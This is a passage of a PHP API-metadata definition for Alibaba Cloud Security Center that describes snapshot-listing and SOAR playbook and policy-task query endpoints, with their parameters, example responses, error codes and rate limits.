'example' => 'ECS_FILE', 'title' => ''], 'ClientId' => ['description' => 'This parameter is returned only if the value of the **SourceType** parameter is **ECS_FILE**. This parameter indicates the ID of the Hybrid Backup Recovery (HBR) agent.'."\n", 'type' => 'string', 'example' => 'c-000dbefaw9f7gnbw****', 'title' => ''], 'ItemsDone' => ['description' => 'The number of backup objects.'."\n" ."\n" .'> This parameter is available only for file backup.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '6', 'title' => ''], 'BytesTotal' => ['description' => 'The total data amount of the data source. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '3484541815****', 'title' => ''], 'Retention' => ['description' => 'The retention period of the backup snapshot.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '7', 'title' => ''], 'CreatedTime' => ['description' => 'The time when the backup snapshot was created. The value is a UNIX timestamp. Unit: seconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1646793988', 'title' => ''], 'ParentSnapshotHash' => ['description' => 'The hash value of the parent backup snapshot.'."\n", 'type' => 'string', 'example' => 'a0181606689c9562f092b3190bddb8a62bb5a24784424ba2102bc7fe92ae****', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the ECS instance.'."\n", 'type' => 'string', 'example' => 'i-2ze78zfakirgh1yl****', 'title' => ''], 'PlanId' => ['description' => 'The ID of the backup plan.'."\n", 'type' => 'string', 'example' => 'plan-000ee8gh2ljelsnb****', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region in which backup snapshot is stored.'."\n", 'type' => 'string', 'example' => 'us-east-1', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => 'd332af48-1269-4a55-a6db-8543a80f****', 'title' => ''], 'ErrorFile' => ['description' => 'The file that records the information about backup failures, including the information about partially completed backup tasks.'."\n", 'type' => 'string', 'example' => 's-0008ndhgrflh55i5****.csv', 'title' => ''], 'SnapshotId' => ['description' => 'The ID of the backup snapshot.'."\n", 'type' => 'string', 'example' => 's-0003ahfuqpjdztsg****', 'title' => ''], 'JobId' => ['description' => 'The ID of the backup task.'."\n", 'type' => 'string', 'example' => 'job-000a2q5vg6awgo01****', 'title' => ''], 'Path' => ['description' => 'This parameter is returned only if the value of the **SourceType** parameter is **ECS_FILE**. This parameter indicates the path to the backup files.'."\n", 'type' => 'string', 'example' => '["/home"]'."\n", 'title' => ''], 'ItemsTotal' => ['description' => 'The total number of objects in the data source.'."\n" ."\n" .'> This parameter is available only for file backup.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '7', 'title' => ''], 'BytesDone' => ['description' => 'The actual amount of data that is generated by incremental backup. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '800', 'title' => ''], 'Paths' => [ 'description' => 'This parameter is returned only if the value of the **SourceType** parameter is **NAS**. This parameter indicates the path to the backup files.'."\n", 'type' => 'array', 'items' => ['description' => 'The path information about the backup snapshot.'."\n", 'type' => 'string', 'example' => '/home', 'title' => ''], 'title' => '', 'example' => '', ], 'ClientVersion' => ['description' => 'The version of the anti-ransomware agent.'."\n", 'type' => 'string', 'example' => '2.10.0', 'title' => ''], 'ExpireTime' => ['title' => '', 'description' => 'Snapshot expiration timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1799132915000'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"NextToken\\": \\"CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2NDc4****\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 20\\n },\\n \\"Snapshots\\": [\\n {\\n \\"Status\\": \\"COMPLETE\\",\\n \\"SnapshotHash\\": \\"9ee47cf12351e4ddecce8c12f4957d3946cd96fbe24cd4ab264c7200839d****\\",\\n \\"ActualItems\\": 123,\\n \\"VaultId\\": \\"v-000ccok3zmw7fbzz****\\",\\n \\"ActualBytes\\": 0,\\n \\"SourceType\\": \\"ECS_FILE\\",\\n \\"ClientId\\": \\"c-000dbefaw9f7gnbw****\\",\\n \\"ItemsDone\\": 6,\\n \\"BytesTotal\\": 0,\\n \\"Retention\\": 7,\\n \\"CreatedTime\\": 1646793988,\\n \\"ParentSnapshotHash\\": \\"a0181606689c9562f092b3190bddb8a62bb5a24784424ba2102bc7fe92ae****\\",\\n \\"InstanceId\\": \\"i-2ze78zfakirgh1yl****\\",\\n \\"PlanId\\": \\"plan-000ee8gh2ljelsnb****\\",\\n \\"RegionId\\": \\"us-east-1\\",\\n \\"Uuid\\": \\"d332af48-1269-4a55-a6db-8543a80f****\\",\\n \\"ErrorFile\\": \\"s-0008ndhgrflh55i5****.csv\\",\\n \\"SnapshotId\\": \\"s-0003ahfuqpjdztsg****\\",\\n \\"JobId\\": \\"job-000a2q5vg6awgo01****\\",\\n \\"Path\\": \\"[\\\\\\"/home\\\\\\"]\\\\n\\",\\n \\"ItemsTotal\\": 7,\\n \\"BytesDone\\": 800,\\n \\"Paths\\": [\\n \\"/home\\"\\n ],\\n \\"ClientVersion\\": \\"2.10.0\\",\\n \\"ExpireTime\\": 1799132915000\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSnapshots', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '60', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSnapshots'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSnapshots', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSoarPlaybookTaskDetail' => [ 'summary' => 'Query the execution details of a remediation task playbook', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '240722', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'RecordId', 'in' => 'query', 'schema' => ['description' => 'The vulnerability ID passed when creating the policy task.'."\n" .'> You can obtain this parameter by calling the [DescribeVulList](~~DescribeVulList~~) interface.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '14', 'title' => ''], ], [ 'name' => 'PlaybookId', 'in' => 'query', 'schema' => ['description' => 'Playbook ID.'."\n" .'> You can obtain this parameter by calling the [DescribePlaybooks](~~2627461~~) interface.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'RequestUuid', 'in' => 'query', 'schema' => ['description' => 'UUID of the playbook task execution.'."\n" .'> You can obtain this parameter by calling the [DescribeSoarRecords](~~2627455~~) interface.', 'type' => 'string', 'required' => true, 'example' => 'a15e37da-abe0-4d87-acd2-024e875a****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Return content.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the current call request, which is a unique identifier generated by Alibaba Cloud for this request, and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF4****'], 'TaskDetail' => [ 'description' => 'Task details.', 'type' => 'object', 'properties' => [ 'LogInfo' => ['description' => 'Log information of the task.', 'type' => 'string', 'example' => '{"status":1, "errMsg":"paramError"}', 'title' => ''], 'ProcessInfo' => ['description' => 'Process information corresponding to the strategy.', 'type' => 'string', 'example' => '{"edges":[{"level":0,"removeFlag":0,"source":1,"target":8}]}', 'title' => ''], 'Params' => ['description' => 'Parameters for invoking the playbook.', 'type' => 'string', 'example' => 'params1', 'title' => ''], 'TaskName' => ['description' => 'Task name.', 'type' => 'string', 'example' => 'task1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF4****\\",\\n \\"TaskDetail\\": {\\n \\"LogInfo\\": \\"{\\\\\\"status\\\\\\":1, \\\\\\"errMsg\\\\\\":\\\\\\"paramError\\\\\\"}\\",\\n \\"ProcessInfo\\": \\"{\\\\\\"edges\\\\\\":[{\\\\\\"level\\\\\\":0,\\\\\\"removeFlag\\\\\\":0,\\\\\\"source\\\\\\":1,\\\\\\"target\\\\\\":8}]}\\",\\n \\"Params\\": \\"params1\\",\\n \\"TaskName\\": \\"task1\\"\\n }\\n}","type":"json"}]', 'title' => 'Query Playbook Task Details', 'description' => 'This API is only supported by the Enterprise and Flagship editions of Cloud Security Center, other versions do not support it.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarPlaybookTaskDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarPlaybookTaskDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSoarStrategies' => [ 'summary' => 'Queries the policy templates on the Playbook page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92198', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'PageNumber', 'in' => 'query', 'schema' => ['description' => 'The page number. Pages start from page 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '4BB99533-4FDC-5B9C-A5E4-5AE3E9BE5C78', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'PageNumber' => ['description' => 'The page number. Pages start from page 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'SoarStrategies' => [ 'description' => 'The policies.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the policy.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the policy. Valid values:'."\n" ."\n" .'* type_vulfix: vulnerability operations'."\n", 'type' => 'string', 'example' => 'type_vulfix', 'title' => ''], 'Description' => ['description' => 'The description of the policy.'."\n", 'type' => 'string', 'example' => 'strategy_description_01', 'title' => ''], 'GmtCreate' => ['description' => 'The timestamp when the policy was created. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1703556715000', 'title' => ''], 'RunMode' => ['description' => 'The execution mode. Valid values:'."\n" ."\n" .'* runmode_TRIGGER_BY_USER: manually executed'."\n", 'type' => 'string', 'example' => 'runmode_TRIGGER_BY_USER', 'title' => ''], 'GmtModified' => ['description' => 'The timestamp when the policy was modified. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1698114242000', 'title' => ''], 'Name' => ['description' => 'The name of the policy.'."\n", 'type' => 'string', 'example' => 'strategy_name01', 'title' => ''], 'Id' => ['description' => 'The ID of the policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '16064025', 'title' => ''], 'Creator' => ['description' => 'The Alibaba Cloud account ID of the creator. Default value: 0. The value indicates a system user.'."\n", 'type' => 'string', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4BB99533-4FDC-5B9C-A5E4-5AE3E9BE5C78\\",\\n \\"PageSize\\": 20,\\n \\"PageNumber\\": 1,\\n \\"TotalCount\\": 100,\\n \\"SoarStrategies\\": [\\n {\\n \\"Type\\": \\"type_vulfix\\",\\n \\"Description\\": \\"strategy_description_01\\",\\n \\"GmtCreate\\": 1703556715000,\\n \\"RunMode\\": \\"runmode_TRIGGER_BY_USER\\",\\n \\"GmtModified\\": 1698114242000,\\n \\"Name\\": \\"strategy_name01\\",\\n \\"Id\\": 16064025,\\n \\"Creator\\": \\"0\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSoarStrategies', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategies'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarStrategies', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSoarStrategyParam' => [ 'summary' => 'Queries the parameters of a policy on the Playbook page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92199', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy.'."\n" ."\n" .'> You can call the [DescribeSoarStrategies](~~DescribeSoarStrategies~~) operation to obtain the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '15553', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'ProcessInfo' => ['description' => 'The process information of the policy.'."\n", 'type' => 'string', 'example' => '{"edges":[{"level":0,"removeFlag":0,"source":1,"target":8}]}', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7', 'title' => ''], 'Params' => ['description' => 'The parameters of the policy.'."\n", 'type' => 'string', 'example' => '{"summary":[{"name":"email","type":"String","isRequired":false,"fromProperty":"notifyConfig.email"}]}', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ProcessInfo\\": \\"{\\\\\\"edges\\\\\\":[{\\\\\\"level\\\\\\":0,\\\\\\"removeFlag\\\\\\":0,\\\\\\"source\\\\\\":1,\\\\\\"target\\\\\\":8}]}\\",\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\",\\n \\"Params\\": \\"{\\\\\\"summary\\\\\\":[{\\\\\\"name\\\\\\":\\\\\\"email\\\\\\",\\\\\\"type\\\\\\":\\\\\\"String\\\\\\",\\\\\\"isRequired\\\\\\":false,\\\\\\"fromProperty\\\\\\":\\\\\\"notifyConfig.email\\\\\\"}]}\\"\\n}","type":"json"}]', 'title' => 'DescribeSoarStrategyParam', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyParam'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarStrategyParam', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSoarStrategyTaskDetail' => [ 'summary' => 'Queries the details of a policy task in the task center, including the task execution status and the corresponding flowchart.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92200', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'StrategyTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy task.'."\n" .'>Call the [DescribeSoarStrategyTasks](~~DescribeSoarStrategyTasks~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '10585', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'FBBEB173-1F43-505F-A876-C03ECDF6CE4C', 'title' => ''], 'TaskDetail' => [ 'description' => 'The task details.', 'type' => 'object', 'properties' => [ 'LogInfo' => ['description' => 'The task execution log information.', 'type' => 'string', 'example' => '{'."\n" .'"resultContent": "{\\"failedNum\\":0,\\"totalNum\\":1,\\"successNum\\":1}",'."\n" .'"resultStatus": 0,'."\n" .'"status": 2'."\n" .'}', 'title' => ''], 'ProcessInfo' => ['description' => 'The flow information corresponding to the policy task.', 'type' => 'string', 'example' => '{'."\n" .' "edges": ['."\n" .' {'."\n" .' "level": 0,'."\n" .' "removeFlag": 0,'."\n" .' "source": 1,'."\n" .' "target": 8'."\n" .' }'."\n" .' ],'."\n" .' "nodes": ['."\n" .' {'."\n" .' "actionId": "Action_014s73k",'."\n" .' "iconUrl": "https://img.alicdn.com/tfs/TB1T*****jSZLeXXb9kVXa-12-14.svg",'."\n" .' "id": 1,'."\n" .' "label": "describeDisks",'."\n" .' "nodeName": "DescribeDisks",'."\n" .' "status": 0,'."\n" .' "type": "openAPI"'."\n" .' }'."\n" .' ]'."\n" .'}', 'title' => ''], 'Params' => ['description' => 'The task parameters.', 'type' => 'string', 'example' => '['."\n" .' {'."\n" .' "name": "vulList",'."\n" .' "associationProperty": "sasAllVul",'."\n" .' "value": ['."\n" .' {'."\n" .' "regionId": "cn-hangzhou",'."\n" .' "instanceId": "i-bp10i3dtyq7x4****5e",'."\n" .' "instanceName": "xxx",'."\n" .' "vulId": 1222,'."\n" .' "vulName": "centos:7:cesa-2024:1249",'."\n" .' "vulAliasName": "CESA-2024:1249",'."\n" .' "vulTag": "oval",'."\n" .' "vulUuid": "3c5eb76a-df89-****-85ef-67562cdc2344",'."\n" .' "vulType": "cve",'."\n" .' "vulModifyTs": 1721324258000'."\n" .' }'."\n" .' ]'."\n" .' },'."\n" .' {'."\n" .' "name": "snapshotConfig",'."\n" .' "associationProperty": "snapshotConfig",'."\n" .' "value": {'."\n" .' "ttl": 1'."\n" .' }'."\n" .' },'."\n" .' {'."\n" .' "name": "notifyConfig",'."\n" .' "associationProperty": "notifyConfig",'."\n" .' "value": {'."\n" .' "ding": ['."\n" .' {'."\n" .' "value": 2195,'."\n" .' "label": "test"'."\n" .' }'."\n" .' ]'."\n" .' }'."\n" .' }'."\n" .']', 'title' => ''], 'TaskName' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'task-1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query policy task details in the task center', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API call. Other editions are not supported.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTaskDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarStrategyTaskDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FBBEB173-1F43-505F-A876-C03ECDF6CE4C\\",\\n \\"TaskDetail\\": {\\n \\"LogInfo\\": \\"{\\\\n\\\\\\"resultContent\\\\\\": \\\\\\"{\\\\\\\\\\\\\\"failedNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"totalNum\\\\\\\\\\\\\\":1,\\\\\\\\\\\\\\"successNum\\\\\\\\\\\\\\":1}\\\\\\",\\\\n\\\\\\"resultStatus\\\\\\": 0,\\\\n\\\\\\"status\\\\\\": 2\\\\n}\\",\\n \\"ProcessInfo\\": \\"{\\\\n \\\\\\"edges\\\\\\": [\\\\n {\\\\n \\\\\\"level\\\\\\": 0,\\\\n \\\\\\"removeFlag\\\\\\": 0,\\\\n \\\\\\"source\\\\\\": 1,\\\\n \\\\\\"target\\\\\\": 8\\\\n }\\\\n ],\\\\n \\\\\\"nodes\\\\\\": [\\\\n {\\\\n \\\\\\"actionId\\\\\\": \\\\\\"Action_014s73k\\\\\\",\\\\n \\\\\\"iconUrl\\\\\\": \\\\\\"https://img.alicdn.com/tfs/TB1T*****jSZLeXXb9kVXa-12-14.svg\\\\\\",\\\\n \\\\\\"id\\\\\\": 1,\\\\n \\\\\\"label\\\\\\": \\\\\\"describeDisks\\\\\\",\\\\n \\\\\\"nodeName\\\\\\": \\\\\\"DescribeDisks\\\\\\",\\\\n \\\\\\"status\\\\\\": 0,\\\\n \\\\\\"type\\\\\\": \\\\\\"openAPI\\\\\\"\\\\n }\\\\n ]\\\\n}\\",\\n \\"Params\\": \\"[\\\\n {\\\\n \\\\\\"name\\\\\\": \\\\\\"vulList\\\\\\",\\\\n \\\\\\"associationProperty\\\\\\": \\\\\\"sasAllVul\\\\\\",\\\\n \\\\\\"value\\\\\\": [\\\\n {\\\\n \\\\\\"regionId\\\\\\": \\\\\\"cn-hangzhou\\\\\\",\\\\n \\\\\\"instanceId\\\\\\": \\\\\\"i-bp10i3dtyq7x4****5e\\\\\\",\\\\n \\\\\\"instanceName\\\\\\": \\\\\\"xxx\\\\\\",\\\\n \\\\\\"vulId\\\\\\": 1222,\\\\n \\\\\\"vulName\\\\\\": \\\\\\"centos:7:cesa-2024:1249\\\\\\",\\\\n \\\\\\"vulAliasName\\\\\\": \\\\\\"CESA-2024:1249\\\\\\",\\\\n \\\\\\"vulTag\\\\\\": \\\\\\"oval\\\\\\",\\\\n \\\\\\"vulUuid\\\\\\": \\\\\\"3c5eb76a-df89-****-85ef-67562cdc2344\\\\\\",\\\\n \\\\\\"vulType\\\\\\": \\\\\\"cve\\\\\\",\\\\n \\\\\\"vulModifyTs\\\\\\": 1721324258000\\\\n }\\\\n ]\\\\n },\\\\n {\\\\n \\\\\\"name\\\\\\": \\\\\\"snapshotConfig\\\\\\",\\\\n \\\\\\"associationProperty\\\\\\": \\\\\\"snapshotConfig\\\\\\",\\\\n \\\\\\"value\\\\\\": {\\\\n \\\\\\"ttl\\\\\\": 1\\\\n }\\\\n },\\\\n {\\\\n \\\\\\"name\\\\\\": \\\\\\"notifyConfig\\\\\\",\\\\n \\\\\\"associationProperty\\\\\\": \\\\\\"notifyConfig\\\\\\",\\\\n \\\\\\"value\\\\\\": {\\\\n \\\\\\"ding\\\\\\": [\\\\n {\\\\n \\\\\\"value\\\\\\": 2195,\\\\n \\\\\\"label\\\\\\": \\\\\\"test\\\\\\"\\\\n }\\\\n ]\\\\n }\\\\n }\\\\n]\\",\\n \\"TaskName\\": \\"task-1\\"\\n }\\n}","type":"json"}]', ], 'DescribeSoarStrategyTaskParams' => [ 'summary' => 'Queries the parameters of a policy task in the task center.', 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '136820', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'StrategyTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy task.'."\n" .'>Call the [DescribeSoarStrategyTasks](~~DescribeSoarStrategyTasks~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '100', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BR****', 'title' => ''], 'TaskDetail' => [ 'description' => 'The task details.', 'type' => 'object', 'properties' => [ 'Params' => ['description' => 'The task parameters.', 'type' => 'string', 'example' => '{"summary":[{"name":"email","type":"String","isRequired":false,"fromProperty":"notifyConfig.email"}]}', 'title' => ''], 'TaskName' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'task1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query policy task parameters in the task center', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API operation. Other editions do not support this operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTaskParams'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarStrategyTaskParams', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BR****\\",\\n \\"TaskDetail\\": {\\n \\"Params\\": \\"{\\\\\\"summary\\\\\\":[{\\\\\\"name\\\\\\":\\\\\\"email\\\\\\",\\\\\\"type\\\\\\":\\\\\\"String\\\\\\",\\\\\\"isRequired\\\\\\":false,\\\\\\"fromProperty\\\\\\":\\\\\\"notifyConfig.email\\\\\\"}]}\\",\\n \\"TaskName\\": \\"task1\\"\\n }\\n}","type":"json"}]', ], 'DescribeSoarStrategyTaskResult' => [ 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '136812', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'StrategyTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy task.'."\n" .'>Call the [DescribeSoarStrategyTasks](~~DescribeSoarStrategyTasks~~) operation to obtain this parameter.', 'type' => 